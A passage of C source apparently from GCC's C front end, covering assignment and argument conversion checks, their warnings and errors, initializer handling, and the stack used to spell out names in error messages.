an unprototyped function, it is compile-time undefined;
making it a constraint in that case was rejected in
DR#252. */
const char msg[] = "void value not ignored as it ought to be";
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
return error_mark_node;
}
rhs = require_complete_type (location, rhs);
if (rhs == error_mark_node)
return error_mark_node;
if (coder == POINTER_TYPE && reject_gcc_builtin (rhs))
return error_mark_node;
/* A non-reference type can convert to a reference. This handles
va_start, va_copy and possibly port built-ins. */
if (codel == REFERENCE_TYPE && coder != REFERENCE_TYPE)
{
if (!lvalue_p (rhs))
{
const char msg[] = "cannot pass rvalue to reference parameter";
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
return error_mark_node;
}
if (!c_mark_addressable (rhs))
return error_mark_node;
rhs = build1 (ADDR_EXPR, build_pointer_type (TREE_TYPE (rhs)), rhs);
SET_EXPR_LOCATION (rhs, location);
rhs = convert_for_assignment (location, expr_loc,
build_pointer_type (TREE_TYPE (type)),
rhs, origtype, errtype,
null_pointer_constant, fundecl, function,
parmnum, warnopt);
if (rhs == error_mark_node)
return error_mark_node;
rhs = build1 (NOP_EXPR, type, rhs);
SET_EXPR_LOCATION (rhs, location);
return rhs;
}
/* Some types can interconvert without explicit casts. */
else if (codel == VECTOR_TYPE && coder == VECTOR_TYPE
&& vector_types_convertible_p (type, TREE_TYPE (rhs), true))
return convert (type, rhs);
/* Arithmetic types all interconvert, and enum is treated like int. */
else if ((codel == INTEGER_TYPE || codel == REAL_TYPE
|| codel == FIXED_POINT_TYPE
|| codel == ENUMERAL_TYPE || codel == COMPLEX_TYPE
|| codel == BOOLEAN_TYPE)
&& (coder == INTEGER_TYPE || coder == REAL_TYPE
|| coder == FIXED_POINT_TYPE
|| coder == ENUMERAL_TYPE || coder == COMPLEX_TYPE
|| coder == BOOLEAN_TYPE))
{
if (warnopt && errtype == ic_argpass)
maybe_warn_builtin_no_proto_arg (expr_loc, fundecl, parmnum, type,
rhstype);
bool save = in_late_binary_op;
if (codel == BOOLEAN_TYPE || codel == COMPLEX_TYPE
|| (coder == REAL_TYPE
&& (codel == INTEGER_TYPE || codel == ENUMERAL_TYPE)
&& sanitize_flags_p (SANITIZE_FLOAT_CAST)))
in_late_binary_op = true;
tree ret = convert_and_check (expr_loc != UNKNOWN_LOCATION
? expr_loc : location, type, orig_rhs);
in_late_binary_op = save;
return ret;
}
/* Aggregates in different TUs might need conversion. */
if ((codel == RECORD_TYPE || codel == UNION_TYPE)
&& codel == coder
&& comptypes (type, rhstype))
return convert_and_check (expr_loc != UNKNOWN_LOCATION
? expr_loc : location, type, rhs);
/* Conversion to a transparent union or record from its member types.
This applies only to function arguments. */
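/* E.g. (hypothetical):
     typedef union { int *ip; float *fp; } U
       __attribute__ ((__transparent_union__));
     void g (U);
   allows 'g (&i)' for an 'int i' without a cast; the matching
   member is selected by the loop below.  */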
if (((codel == UNION_TYPE || codel == RECORD_TYPE)
&& TYPE_TRANSPARENT_AGGR (type))
&& errtype == ic_argpass)
{
tree memb, marginal_memb = NULL_TREE;
for (memb = TYPE_FIELDS (type); memb ; memb = DECL_CHAIN (memb))
{
tree memb_type = TREE_TYPE (memb);
if (comptypes (TYPE_MAIN_VARIANT (memb_type),
TYPE_MAIN_VARIANT (rhstype)))
break;
if (TREE_CODE (memb_type) != POINTER_TYPE)
continue;
if (coder == POINTER_TYPE)
{
tree ttl = TREE_TYPE (memb_type);
tree ttr = TREE_TYPE (rhstype);
/* Any non-function converts to a [const][volatile] void *
and vice versa; otherwise, targets must be the same.
Meanwhile, the lhs target must have all the qualifiers of
the rhs. */
if ((VOID_TYPE_P (ttl) && !TYPE_ATOMIC (ttl))
|| (VOID_TYPE_P (ttr) && !TYPE_ATOMIC (ttr))
|| comp_target_types (location, memb_type, rhstype))
{
int lquals = TYPE_QUALS (ttl) & ~TYPE_QUAL_ATOMIC;
int rquals = TYPE_QUALS (ttr) & ~TYPE_QUAL_ATOMIC;
/* If this type won't generate any warnings, use it. */
if (lquals == rquals
|| ((TREE_CODE (ttr) == FUNCTION_TYPE
&& TREE_CODE (ttl) == FUNCTION_TYPE)
? ((lquals | rquals) == rquals)
: ((lquals | rquals) == lquals)))
break;
/* Keep looking for a better type, but remember this one. */
if (!marginal_memb)
marginal_memb = memb;
}
}
/* Can convert integer zero to any pointer type. */
if (null_pointer_constant)
{
rhs = null_pointer_node;
break;
}
}
if (memb || marginal_memb)
{
if (!memb)
{
/* We have only a marginally acceptable member type;
it needs a warning. */
tree ttl = TREE_TYPE (TREE_TYPE (marginal_memb));
tree ttr = TREE_TYPE (rhstype);
/* Const and volatile mean something different for function
types, so the usual warnings are not appropriate. */
if (TREE_CODE (ttr) == FUNCTION_TYPE
&& TREE_CODE (ttl) == FUNCTION_TYPE)
{
/* Because const and volatile on functions are
restrictions that say the function will not do
certain things, it is okay to use a const or volatile
function where an ordinary one is wanted, but not
vice-versa. */
if (TYPE_QUALS_NO_ADDR_SPACE (ttl)
& ~TYPE_QUALS_NO_ADDR_SPACE (ttr))
PEDWARN_FOR_QUALIFIERS (location, expr_loc,
OPT_Wdiscarded_qualifiers,
G_("passing argument %d of %qE "
"makes %q#v qualified function "
"pointer from unqualified"),
G_("assignment makes %q#v qualified "
"function pointer from "
"unqualified"),
G_("initialization makes %q#v qualified "
"function pointer from "
"unqualified"),
G_("return makes %q#v qualified function "
"pointer from unqualified"),
TYPE_QUALS (ttl) & ~TYPE_QUALS (ttr));
}
else if (TYPE_QUALS_NO_ADDR_SPACE (ttr)
& ~TYPE_QUALS_NO_ADDR_SPACE (ttl))
PEDWARN_FOR_QUALIFIERS (location, expr_loc,
OPT_Wdiscarded_qualifiers,
G_("passing argument %d of %qE discards "
"%qv qualifier from pointer target type"),
G_("assignment discards %qv qualifier "
"from pointer target type"),
G_("initialization discards %qv qualifier "
"from pointer target type"),
G_("return discards %qv qualifier from "
"pointer target type"),
TYPE_QUALS (ttr) & ~TYPE_QUALS (ttl));
memb = marginal_memb;
}
if (!fundecl || !DECL_IN_SYSTEM_HEADER (fundecl))
pedwarn (location, OPT_Wpedantic,
"ISO C prohibits argument conversion to union type");
rhs = fold_convert_loc (location, TREE_TYPE (memb), rhs);
return build_constructor_single (type, memb, rhs);
}
}
/* Conversions among pointers */
else if ((codel == POINTER_TYPE || codel == REFERENCE_TYPE)
&& (coder == codel))
{
/* If RHS refers to a built-in declared without a prototype
BLTIN is the declaration of the built-in with a prototype
and RHSTYPE is set to the actual type of the built-in. */
tree bltin;
rhstype = type_or_builtin_type (rhs, &bltin);
tree ttl = TREE_TYPE (type);
tree ttr = TREE_TYPE (rhstype);
tree mvl = ttl;
tree mvr = ttr;
bool is_opaque_pointer;
int target_cmp = 0; /* Cache comp_target_types () result. */
addr_space_t asl;
addr_space_t asr;
if (TREE_CODE (mvl) != ARRAY_TYPE)
mvl = (TYPE_ATOMIC (mvl)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mvl),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mvl));
if (TREE_CODE (mvr) != ARRAY_TYPE)
mvr = (TYPE_ATOMIC (mvr)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mvr),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mvr));
/* Opaque pointers are treated like void pointers. */
is_opaque_pointer = vector_targets_convertible_p (ttl, ttr);
/* The Plan 9 compiler permits a pointer to a struct to be
automatically converted into a pointer to an anonymous field
within the struct. */
if (flag_plan9_extensions
&& RECORD_OR_UNION_TYPE_P (mvl)
&& RECORD_OR_UNION_TYPE_P (mvr)
&& mvl != mvr)
{
tree new_rhs = convert_to_anonymous_field (location, type, rhs);
if (new_rhs != NULL_TREE)
{
rhs = new_rhs;
rhstype = TREE_TYPE (rhs);
coder = TREE_CODE (rhstype);
ttr = TREE_TYPE (rhstype);
mvr = TYPE_MAIN_VARIANT (ttr);
}
}
/* C++ does not allow the implicit conversion void* -> T*. However,
for the purpose of reducing the number of false positives, we
tolerate the special case of
int *p = NULL;
where NULL is typically defined in C to be '(void *) 0'. */
if (VOID_TYPE_P (ttr) && rhs != null_pointer_node && !VOID_TYPE_P (ttl))
warning_at (errtype == ic_argpass ? expr_loc : location,
OPT_Wc___compat,
"request for implicit conversion "
"from %qT to %qT not permitted in C++", rhstype, type);
/* See if the pointers point to incompatible address spaces. */
asl = TYPE_ADDR_SPACE (ttl);
asr = TYPE_ADDR_SPACE (ttr);
if (!null_pointer_constant_p (rhs)
&& asr != asl && !targetm.addr_space.subset_p (asr, asl))
{
switch (errtype)
{
case ic_argpass:
{
const char msg[] = G_("passing argument %d of %qE from "
"pointer to non-enclosed address space");
if (warnopt)
warning_at (expr_loc, warnopt, msg, parmnum, rname);
else
error_at (expr_loc, msg, parmnum, rname);
break;
}
case ic_assign:
{
const char msg[] = G_("assignment from pointer to "
"non-enclosed address space");
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
break;
}
case ic_init:
{
const char msg[] = G_("initialization from pointer to "
"non-enclosed address space");
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
break;
}
case ic_return:
{
const char msg[] = G_("return from pointer to "
"non-enclosed address space");
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
break;
}
default:
gcc_unreachable ();
}
return error_mark_node;
}
/* Check if the right-hand side has a format attribute but the
left-hand side doesn't. */
if (warn_suggest_attribute_format
&& check_missing_format_attribute (type, rhstype))
{
switch (errtype)
{
case ic_argpass:
warning_at (expr_loc, OPT_Wsuggest_attribute_format,
"argument %d of %qE might be "
"a candidate for a format attribute",
parmnum, rname);
break;
case ic_assign:
warning_at (location, OPT_Wsuggest_attribute_format,
"assignment left-hand side might be "
"a candidate for a format attribute");
break;
case ic_init:
warning_at (location, OPT_Wsuggest_attribute_format,
"initialization left-hand side might be "
"a candidate for a format attribute");
break;
case ic_return:
warning_at (location, OPT_Wsuggest_attribute_format,
"return type might be "
"a candidate for a format attribute");
break;
default:
gcc_unreachable ();
}
}
/* Any non-function converts to a [const][volatile] void *
and vice versa; otherwise, targets must be the same.
Meanwhile, the lhs target must have all the qualifiers of the rhs. */
if ((VOID_TYPE_P (ttl) && !TYPE_ATOMIC (ttl))
|| (VOID_TYPE_P (ttr) && !TYPE_ATOMIC (ttr))
|| (target_cmp = comp_target_types (location, type, rhstype))
|| is_opaque_pointer
|| ((c_common_unsigned_type (mvl)
== c_common_unsigned_type (mvr))
&& (c_common_signed_type (mvl)
== c_common_signed_type (mvr))
&& TYPE_ATOMIC (mvl) == TYPE_ATOMIC (mvr)))
{
/* Warn about loss of qualifiers from pointers to arrays with
qualifiers on the element type. */
if (TREE_CODE (ttr) == ARRAY_TYPE)
{
ttr = strip_array_types (ttr);
ttl = strip_array_types (ttl);
if (TYPE_QUALS_NO_ADDR_SPACE_NO_ATOMIC (ttr)
& ~TYPE_QUALS_NO_ADDR_SPACE_NO_ATOMIC (ttl))
WARNING_FOR_QUALIFIERS (location, expr_loc,
OPT_Wdiscarded_array_qualifiers,
G_("passing argument %d of %qE discards "
"%qv qualifier from pointer target type"),
G_("assignment discards %qv qualifier "
"from pointer target type"),
G_("initialization discards %qv qualifier "
"from pointer target type"),
G_("return discards %qv qualifier from "
"pointer target type"),
TYPE_QUALS (ttr) & ~TYPE_QUALS (ttl));
}
else if (pedantic
&& ((VOID_TYPE_P (ttl) && TREE_CODE (ttr) == FUNCTION_TYPE)
||
(VOID_TYPE_P (ttr)
&& !null_pointer_constant
&& TREE_CODE (ttl) == FUNCTION_TYPE)))
PEDWARN_FOR_ASSIGNMENT (location, expr_loc, OPT_Wpedantic,
G_("ISO C forbids passing argument %d of "
"%qE between function pointer "
"and %<void *%>"),
G_("ISO C forbids assignment between "
"function pointer and %<void *%>"),
G_("ISO C forbids initialization between "
"function pointer and %<void *%>"),
G_("ISO C forbids return between function "
"pointer and %<void *%>"));
/* Const and volatile mean something different for function types,
so the usual warnings are not appropriate. */
else if (TREE_CODE (ttr) != FUNCTION_TYPE
&& TREE_CODE (ttl) != FUNCTION_TYPE)
{
/* Don't warn about loss of qualifier for conversions from
qualified void* to pointers to arrays with corresponding
qualifier on the element type. */
if (!pedantic)
ttl = strip_array_types (ttl);
/* Assignments between atomic and non-atomic objects are OK. */
if (TYPE_QUALS_NO_ADDR_SPACE_NO_ATOMIC (ttr)
& ~TYPE_QUALS_NO_ADDR_SPACE_NO_ATOMIC (ttl))
{
PEDWARN_FOR_QUALIFIERS (location, expr_loc,
OPT_Wdiscarded_qualifiers,
G_("passing argument %d of %qE discards "
"%qv qualifier from pointer target type"),
G_("assignment discards %qv qualifier "
"from pointer target type"),
G_("initialization discards %qv qualifier "
"from pointer target type"),
G_("return discards %qv qualifier from "
"pointer target type"),
TYPE_QUALS (ttr) & ~TYPE_QUALS (ttl));
}
/* If this is not a case of ignoring a mismatch in signedness,
no warning. */
else if (VOID_TYPE_P (ttl) || VOID_TYPE_P (ttr)
|| target_cmp)
;
/* If there is a mismatch, do warn. */
else if (warn_pointer_sign)
switch (errtype)
{
case ic_argpass:
{
auto_diagnostic_group d;
range_label_for_type_mismatch rhs_label (rhstype, type);
gcc_rich_location richloc (expr_loc, &rhs_label);
if (pedwarn (&richloc, OPT_Wpointer_sign,
"pointer targets in passing argument %d of "
"%qE differ in signedness", parmnum, rname))
inform_for_arg (fundecl, expr_loc, parmnum, type,
rhstype);
}
break;
case ic_assign:
pedwarn (location, OPT_Wpointer_sign,
"pointer targets in assignment from %qT to %qT "
"differ in signedness", rhstype, type);
break;
case ic_init:
pedwarn_init (location, OPT_Wpointer_sign,
"pointer targets in initialization of %qT "
"from %qT differ in signedness", type,
rhstype);
break;
case ic_return:
pedwarn (location, OPT_Wpointer_sign, "pointer targets in "
"returning %qT from a function with return type "
"%qT differ in signedness", rhstype, type);
break;
default:
gcc_unreachable ();
}
}
else if (TREE_CODE (ttl) == FUNCTION_TYPE
&& TREE_CODE (ttr) == FUNCTION_TYPE)
{
/* Because const and volatile on functions are restrictions
that say the function will not do certain things,
it is okay to use a const or volatile function
where an ordinary one is wanted, but not vice-versa. */
if (TYPE_QUALS_NO_ADDR_SPACE (ttl)
& ~TYPE_QUALS_NO_ADDR_SPACE (ttr))
PEDWARN_FOR_QUALIFIERS (location, expr_loc,
OPT_Wdiscarded_qualifiers,
G_("passing argument %d of %qE makes "
"%q#v qualified function pointer "
"from unqualified"),
G_("assignment makes %q#v qualified function "
"pointer from unqualified"),
G_("initialization makes %q#v qualified "
"function pointer from unqualified"),
G_("return makes %q#v qualified function "
"pointer from unqualified"),
TYPE_QUALS (ttl) & ~TYPE_QUALS (ttr));
}
}
/* Avoid warning about the volatile ObjC EH puts on decls. */
else if (!objc_ok)
{
switch (errtype)
{
case ic_argpass:
{
auto_diagnostic_group d;
range_label_for_type_mismatch rhs_label (rhstype, type);
gcc_rich_location richloc (expr_loc, &rhs_label);
if (pedwarn (&richloc, OPT_Wincompatible_pointer_types,
"passing argument %d of %qE from incompatible "
"pointer type", parmnum, rname))
inform_for_arg (fundecl, expr_loc, parmnum, type, rhstype);
}
break;
case ic_assign:
if (bltin)
pedwarn (location, OPT_Wincompatible_pointer_types,
"assignment to %qT from pointer to "
"%qD with incompatible type %qT",
type, bltin, rhstype);
else
pedwarn (location, OPT_Wincompatible_pointer_types,
"assignment to %qT from incompatible pointer type %qT",
type, rhstype);
break;
case ic_init:
if (bltin)
pedwarn_init (location, OPT_Wincompatible_pointer_types,
"initialization of %qT from pointer to "
"%qD with incompatible type %qT",
type, bltin, rhstype);
else
pedwarn_init (location, OPT_Wincompatible_pointer_types,
"initialization of %qT from incompatible "
"pointer type %qT",
type, rhstype);
break;
case ic_return:
if (bltin)
pedwarn (location, OPT_Wincompatible_pointer_types,
"returning pointer to %qD of type %qT from "
"a function with incompatible type %qT",
bltin, rhstype, type);
else
pedwarn (location, OPT_Wincompatible_pointer_types,
"returning %qT from a function with incompatible "
"return type %qT", rhstype, type);
break;
default:
gcc_unreachable ();
}
}
/* If RHS isn't an address, check pointer or array of packed
struct or union. */
warn_for_address_or_pointer_of_packed_member (type, orig_rhs);
return convert (type, rhs);
}
else if (codel == POINTER_TYPE && coder == ARRAY_TYPE)
{
/* ??? This should not be an error when inlining calls to
unprototyped functions. */
const char msg[] = "invalid use of non-lvalue array";
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
return error_mark_node;
}
else if (codel == POINTER_TYPE && coder == INTEGER_TYPE)
{
/* An explicit constant 0 can convert to a pointer,
or one that results from arithmetic, even including
a cast to integer type. */
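/* E.g. 'int *p = 0;' is accepted silently, while 'int *p = 1;'
draws -Wint-conversion below (sketch).  */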
if (!null_pointer_constant)
switch (errtype)
{
case ic_argpass:
{
auto_diagnostic_group d;
range_label_for_type_mismatch rhs_label (rhstype, type);
gcc_rich_location richloc (expr_loc, &rhs_label);
if (pedwarn (&richloc, OPT_Wint_conversion,
"passing argument %d of %qE makes pointer from "
"integer without a cast", parmnum, rname))
inform_for_arg (fundecl, expr_loc, parmnum, type, rhstype);
}
break;
case ic_assign:
pedwarn (location, OPT_Wint_conversion,
"assignment to %qT from %qT makes pointer from integer "
"without a cast", type, rhstype);
break;
case ic_init:
pedwarn_init (location, OPT_Wint_conversion,
"initialization of %qT from %qT makes pointer from "
"integer without a cast", type, rhstype);
break;
case ic_return:
pedwarn (location, OPT_Wint_conversion, "returning %qT from a "
"function with return type %qT makes pointer from "
"integer without a cast", rhstype, type);
break;
default:
gcc_unreachable ();
}
return convert (type, rhs);
}
else if (codel == INTEGER_TYPE && coder == POINTER_TYPE)
{
switch (errtype)
{
case ic_argpass:
{
auto_diagnostic_group d;
range_label_for_type_mismatch rhs_label (rhstype, type);
gcc_rich_location richloc (expr_loc, &rhs_label);
if (pedwarn (&richloc, OPT_Wint_conversion,
"passing argument %d of %qE makes integer from "
"pointer without a cast", parmnum, rname))
inform_for_arg (fundecl, expr_loc, parmnum, type, rhstype);
}
break;
case ic_assign:
pedwarn (location, OPT_Wint_conversion,
"assignment to %qT from %qT makes integer from pointer "
"without a cast", type, rhstype);
break;
case ic_init:
pedwarn_init (location, OPT_Wint_conversion,
"initialization of %qT from %qT makes integer from "
"pointer without a cast", type, rhstype);
break;
case ic_return:
pedwarn (location, OPT_Wint_conversion, "returning %qT from a "
"function with return type %qT makes integer from "
"pointer without a cast", rhstype, type);
break;
default:
gcc_unreachable ();
}
return convert (type, rhs);
}
else if (codel == BOOLEAN_TYPE && coder == POINTER_TYPE)
{
tree ret;
bool save = in_late_binary_op;
in_late_binary_op = true;
ret = convert (type, rhs);
in_late_binary_op = save;
return ret;
}
switch (errtype)
{
case ic_argpass:
{
auto_diagnostic_group d;
range_label_for_type_mismatch rhs_label (rhstype, type);
gcc_rich_location richloc (expr_loc, &rhs_label);
const char msg[] = G_("incompatible type for argument %d of %qE");
if (warnopt)
warning_at (expr_loc, warnopt, msg, parmnum, rname);
else
error_at (&richloc, msg, parmnum, rname);
inform_for_arg (fundecl, expr_loc, parmnum, type, rhstype);
}
break;
case ic_assign:
{
const char msg[]
= G_("incompatible types when assigning to type %qT from type %qT");
if (warnopt)
warning_at (expr_loc, 0, msg, type, rhstype);
else
error_at (expr_loc, msg, type, rhstype);
break;
}
case ic_init:
{
const char msg[]
= G_("incompatible types when initializing type %qT using type %qT");
if (warnopt)
warning_at (location, 0, msg, type, rhstype);
else
error_at (location, msg, type, rhstype);
break;
}
case ic_return:
{
const char msg[]
= G_("incompatible types when returning type %qT but %qT was expected");
if (warnopt)
warning_at (location, 0, msg, rhstype, type);
else
error_at (location, msg, rhstype, type);
break;
}
default:
gcc_unreachable ();
}
return error_mark_node;
}
/* If VALUE is a compound expr all of whose expressions are constant, then
return its value. Otherwise, return error_mark_node.
This is for handling COMPOUND_EXPRs as initializer elements,
which GCC allows with a warning when -pedantic is specified. */
static tree
valid_compound_expr_initializer (tree value, tree endtype)
{
if (TREE_CODE (value) == COMPOUND_EXPR)
{
if (valid_compound_expr_initializer (TREE_OPERAND (value, 0), endtype)
== error_mark_node)
return error_mark_node;
return valid_compound_expr_initializer (TREE_OPERAND (value, 1),
endtype);
}
else if (!initializer_constant_valid_p (value, endtype))
return error_mark_node;
else
return value;
}
/* Perform appropriate conversions on the initial value of a variable,
store it in the declaration DECL,
and print any error messages that are appropriate.
If ORIGTYPE is not NULL_TREE, it is the original type of INIT.
If the init is invalid, store an ERROR_MARK.
INIT_LOC is the location of the initial value. */
void
store_init_value (location_t init_loc, tree decl, tree init, tree origtype)
{
tree value, type;
bool npc = false;
/* If variable's type was invalidly declared, just ignore it. */
type = TREE_TYPE (decl);
if (TREE_CODE (type) == ERROR_MARK)
return;
/* Digest the specified initializer into an expression. */
if (init)
npc = null_pointer_constant_p (init);
value = digest_init (init_loc, type, init, origtype, npc,
true, TREE_STATIC (decl));
/* Store the expression if valid; else report error. */
if (!in_system_header_at (input_location)
&& AGGREGATE_TYPE_P (TREE_TYPE (decl)) && !TREE_STATIC (decl))
warning (OPT_Wtraditional, "traditional C rejects automatic "
"aggregate initialization");
if (value != error_mark_node || TREE_CODE (decl) != FUNCTION_DECL)
DECL_INITIAL (decl) = value;
/* ANSI wants warnings about out-of-range constant initializers. */
STRIP_TYPE_NOPS (value);
if (TREE_STATIC (decl))
constant_expression_warning (value);
/* Check if we need to set array size from compound literal size. */
if (TREE_CODE (type) == ARRAY_TYPE
&& TYPE_DOMAIN (type) == NULL_TREE
&& value != error_mark_node)
{
tree inside_init = init;
STRIP_TYPE_NOPS (inside_init);
inside_init = fold (inside_init);
if (TREE_CODE (inside_init) == COMPOUND_LITERAL_EXPR)
{
tree cldecl = COMPOUND_LITERAL_EXPR_DECL (inside_init);
if (TYPE_DOMAIN (TREE_TYPE (cldecl)))
{
/* For int foo[] = (int [3]){1}; we need to set the array size
now, since later on the array initializer will be just the
brace-enclosed list of the compound literal. */
tree etype = strip_array_types (TREE_TYPE (decl));
type = build_distinct_type_copy (TYPE_MAIN_VARIANT (type));
TYPE_DOMAIN (type) = TYPE_DOMAIN (TREE_TYPE (cldecl));
layout_type (type);
layout_decl (cldecl, 0);
TREE_TYPE (decl)
= c_build_qualified_type (type, TYPE_QUALS (etype));
}
}
}
}
/* Methods for storing and printing names for error messages. */
/* Implement a spelling stack that allows components of a name to be pushed
and popped. Each element on the stack is this structure. */
struct spelling
{
int kind;
union
{
unsigned HOST_WIDE_INT i;
const char *s;
} u;
};
#define SPELLING_STRING 1
#define SPELLING_MEMBER 2
#define SPELLING_BOUNDS 3
static struct spelling *spelling; /* Next stack element (unused). */
static struct spelling *spelling_base; /* Spelling stack base. */
static int spelling_size; /* Size of the spelling stack. */
/* Macros to save and restore the spelling stack around push_... functions.
Alternative to SAVE_SPELLING_STACK. */
#define SPELLING_DEPTH() (spelling - spelling_base)
#define RESTORE_SPELLING_DEPTH(DEPTH) (spelling = spelling_base + (DEPTH))
/* Push an element on the spelling stack with type KIND and assign VALUE
to MEMBER. */
#define PUSH_SPELLING(KIND, VALUE, MEMBER) \
{ \
int depth = SPELLING_DEPTH (); \
\
if (depth >= spelling_size) \
{ \
spelling_size += 10; \
spelling_base = XRESIZEVEC (struct spelling, spelling_base, \
spelling_size); \
RESTORE_SPELLING_DEPTH (depth); \
} \
\
spelling->kind = (KIND); \
spelling->MEMBER = (VALUE); \
spelling++; \
}
/* Push STRING on the stack. Printed literally. */
static void
push_string (const char *string)
{
PUSH_SPELLING (SPELLING_STRING, string, u.s);
}
/* Push a member name on the stack. Printed as '.' STRING. */
static void
push_member_name (tree decl)
{
const char *const string
= (DECL_NAME (decl)
? identifier_to_locale (IDENTIFIER_POINTER (DECL_NAME (decl)))
: _("<anonymous>"));
PUSH_SPELLING (SPELLING_MEMBER, string, u.s);
}
/* Push an array bounds on the stack. Printed as [BOUNDS]. */
static void
push_array_bounds (unsigned HOST_WIDE_INT bounds)
{
PUSH_SPELLING (SPELLING_BOUNDS, bounds, u.i);
}
/* Compute the maximum size in bytes of the printed spelling. */
static int
spelling_length (void)
{
int size = 0;
struct spelling *p;
for (p = spelling_base; p < spelling; p++)
{
if (p->kind == SPELLING_BOUNDS)
size += 25;
else
size += strlen (p->u.s) + 1;
}
return size;
}
/* Print the spelling to BUFFER and return it. */
static char *
print_spelling (char *buffer)
{
char *d = buffer;
struct spelling *p;
for (p = spelling_base; p < spelling; p++)
if (p->kind == SPELLING_BOUNDS)
{
sprintf (d, "[" HOST_WIDE_INT_PRINT_UNSIGNED "]", p->u.i);
d += strlen (d);
}
else
{
const char *s;
if (p->kind == SPELLING_MEMBER)
*d++ = '.';
for (s = p->u.s; (*d = *s++); d++)
;
}
*d++ = '\0';
return buffer;
}
/* Digest the parser output INIT as an initializer for type TYPE.
Return a C expression of type TYPE to represent the initial value.
If ORIGTYPE is not NULL_TREE, it is the original type of INIT.
NULL_POINTER_CONSTANT is true if INIT is a null pointer constant.
If INIT is a string constant, STRICT_STRING is true if it is
unparenthesized or we should not warn here for it being parenthesized.
For other types of INIT, STRICT_STRING is not used.
INIT_LOC is the location of the INIT.
REQUIRE_CONSTANT requests an error if non-constant initializers or
elements are seen. */
static tree
digest_init (location_t init_loc, tree type, tree init, tree origtype,
bool null_pointer_constant, bool strict_string,
int require_constant)
{
enum tree_code code = TREE_CODE (type);
tree inside_init = init;
tree semantic_type = NULL_TREE;
bool maybe_const = true;
if (type == error_mark_node
|| !init
|| error_operand_p (init))
return error_mark_node;
STRIP_TYPE_NOPS (inside_init);
if (TREE_CODE (inside_init) == EXCESS_PRECISION_EXPR)
{
semantic_type = TREE_TYPE (inside_init);
inside_init = TREE_OPERAND (inside_init, 0);
}
inside_init = c_fully_fold (inside_init, require_constant, &maybe_const);
/* Initialization of an array of chars from a string constant
optionally enclosed in braces. */
if (code == ARRAY_TYPE && inside_init
&& TREE_CODE (inside_init) == STRING_CST)
{
tree typ1
= (TYPE_ATOMIC (TREE_TYPE (type))
? c_build_qualified_type (TYPE_MAIN_VARIANT (TREE_TYPE (type)),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (TREE_TYPE (type)));
/* Note that an array could be both an array of character type
and an array of wchar_t if wchar_t is signed char or unsigned
char. */
bool char_array = (typ1 == char_type_node
|| typ1 == signed_char_type_node
|| typ1 == unsigned_char_type_node);
bool wchar_array = !!comptypes (typ1, wchar_type_node);
bool char16_array = !!comptypes (typ1, char16_type_node);
bool char32_array = !!comptypes (typ1, char32_type_node);
if (char_array || wchar_array || char16_array || char32_array)
{
struct c_expr expr;
tree typ2 = TYPE_MAIN_VARIANT (TREE_TYPE (TREE_TYPE (inside_init)));
bool incompat_string_cst = false;
expr.value = inside_init;
expr.original_code = (strict_string ? STRING_CST : ERROR_MARK);
expr.original_type = NULL;
maybe_warn_string_init (init_loc, type, expr);
if (TYPE_DOMAIN (type) && !TYPE_MAX_VALUE (TYPE_DOMAIN (type)))
pedwarn_init (init_loc, OPT_Wpedantic,
"initialization of a flexible array member");
if (comptypes (TYPE_MAIN_VARIANT (TREE_TYPE (inside_init)),
TYPE_MAIN_VARIANT (type)))
return inside_init;
if (char_array)
{
if (typ2 != char_type_node)
incompat_string_cst = true;
}
else if (!comptypes (typ1, typ2))
incompat_string_cst = true;
if (incompat_string_cst)
{
error_init (init_loc, "cannot initialize array of %qT from "
"a string literal with type array of %qT",
typ1, typ2);
return error_mark_node;
}
if (TYPE_DOMAIN (type) != NULL_TREE
&& TYPE_SIZE (type) != NULL_TREE
&& TREE_CODE (TYPE_SIZE (type)) == INTEGER_CST)
{
unsigned HOST_WIDE_INT len = TREE_STRING_LENGTH (inside_init);
unsigned unit = TYPE_PRECISION (typ1) / BITS_PER_UNIT;
/* Subtract the size of a single (possibly wide) character
because it's ok to ignore the terminating null char
that is counted in the length of the constant. */
if (compare_tree_int (TYPE_SIZE_UNIT (type), len - unit) < 0)
pedwarn_init (init_loc, 0,
("initializer-string for array of %qT "
"is too long"), typ1);
else if (warn_cxx_compat
&& compare_tree_int (TYPE_SIZE_UNIT (type), len) < 0)
warning_at (init_loc, OPT_Wc___compat,
("initializer-string for array of %qT "
"is too long for C++"), typ1);
if (compare_tree_int (TYPE_SIZE_UNIT (type), len) < 0)
{
unsigned HOST_WIDE_INT size
= tree_to_uhwi (TYPE_SIZE_UNIT (type));
const char *p = TREE_STRING_POINTER (inside_init);
inside_init = build_string (size, p);
}
}
TREE_TYPE (inside_init) = type;
return inside_init;
}
else if (INTEGRAL_TYPE_P (typ1))
{
error_init (init_loc, "array of inappropriate type initialized "
"from string constant");
return error_mark_node;
}
}
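  /* For example, 'char buf[3] = "abc";' is accepted above: only the
     terminating NUL is dropped, the constant is truncated to the array
     size, and -Wc++-compat warns because C++ rejects it.  By contrast,
     'char buf[3] = "abcd";' draws the "initializer-string ... is too
     long" pedwarn.  */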
/* Build a VECTOR_CST from a *constant* vector constructor. If the
vector constructor is not constant (e.g. {1,2,3,foo()}) then punt
below and handle as a constructor. */
if (code == VECTOR_TYPE
&& VECTOR_TYPE_P (TREE_TYPE (inside_init))
&& vector_types_convertible_p (TREE_TYPE (inside_init), type, true)
&& TREE_CONSTANT (inside_init))
{
if (TREE_CODE (inside_init) == VECTOR_CST
&& comptypes (TYPE_MAIN_VARIANT (TREE_TYPE (inside_init)),
TYPE_MAIN_VARIANT (type)))
return inside_init;
if (TREE_CODE (inside_init) == CONSTRUCTOR)
{
unsigned HOST_WIDE_INT ix;
tree value;
bool constant_p = true;
/* Iterate through elements and check if all constructor
elements are *_CSTs. */
FOR_EACH_CONSTRUCTOR_VALUE (CONSTRUCTOR_ELTS (inside_init), ix, value)
if (!CONSTANT_CLASS_P (value))
{
constant_p = false;
break;
}
if (constant_p)
